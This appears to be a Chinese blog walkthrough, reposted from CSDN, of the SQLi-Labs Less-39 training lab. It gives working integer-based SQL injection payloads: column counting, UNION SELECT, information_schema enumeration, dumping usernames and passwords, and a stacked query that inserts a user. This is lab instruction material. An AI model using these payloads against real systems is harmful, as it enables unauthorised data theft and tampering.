SQLi LABS Less-39

本文阅读 3 分钟
首页 安全分享,WEB安全 正文

第三十九关请求方式为GET请求 , 注入类型为 整形注入

 

第一步,判断注入类型

?id=2 and false -- a

SQL不成立时 , 不报错,并且无显示 , 说明拼接后的SQL可以正常执行 , 固 注入类型为 整形注入

img

源码如下

img

img

 mysqli_multi_query() 可同时执行多条SQL语句 , 满足叠加注入的条件

 

 第二步,判断字段数

使用 order by 测试字段数

?id=2 order by 4 -- a

从第1列开始排序 , 依次加1 , 至4列时报错 , 固 字段数为3

img

 

第三步,判断显示位置

联合查询测试字段显示的位置

?id=-1 union select 1,2,3 -- a

此处的 id=-1 , 由于用户id不为负,所以该SQL查询不出用户数据,返回的结果只有联合查询的 1 2 3 这一条数据 , 目的在于 方便结果的展示

img

 

第四步,获取所有数据库

 查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有的数据库名

?id=-1 union select 1,2,
(select group_concat(schema_name)
from information_schema.schemata)
 -- a

img

下一步 , 根据 security数据库 , 获取其所有表

 

第五步,获取所有表

查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有的数据库名

?id=-1 union select 1,2,
(select group_concat(table_name)
from information_schema.tables 
where table_schema='security')
 -- a

存储的 group_concat() 可以将多行结果合并为一行 , 目的在于更好的展示效果

img

users表为用户表 , 下一步根据 users表 获取其所有字段

 

第六步,获取所有字段

查询information_schema默认数据库的columns表的column_name字段 , 该字段保存了所有字段名

?id=-1 union select 1,2,
(select group_concat(column_name)
from information_schema.columns 
where table_schema='security' and table_name='users')
 -- a

img

至此可知 , 数据库 security, 表 users, 字段 id,username,password , 下一步,根据此信息获取账号密码

 

第七步,获取账号密码

?id=-1 union select 1,2,
(select group_concat(username,'~',password)
from security.users)
 -- a

img

 

第八步,叠加注入

?id=1; insert into users(id,username,password)
values(20,'zhangsan','123')
 -- a

插入的成功与否 , 页面不会显示 , 我们直接通过id访问

img

 

 

 

 

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/118100058
-- 展开阅读全文 --
Redis底层数据结构--跳跃表
« 上一篇 04-28
BUUCTF Web [强网杯 2019]随便注
下一篇 » 06-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复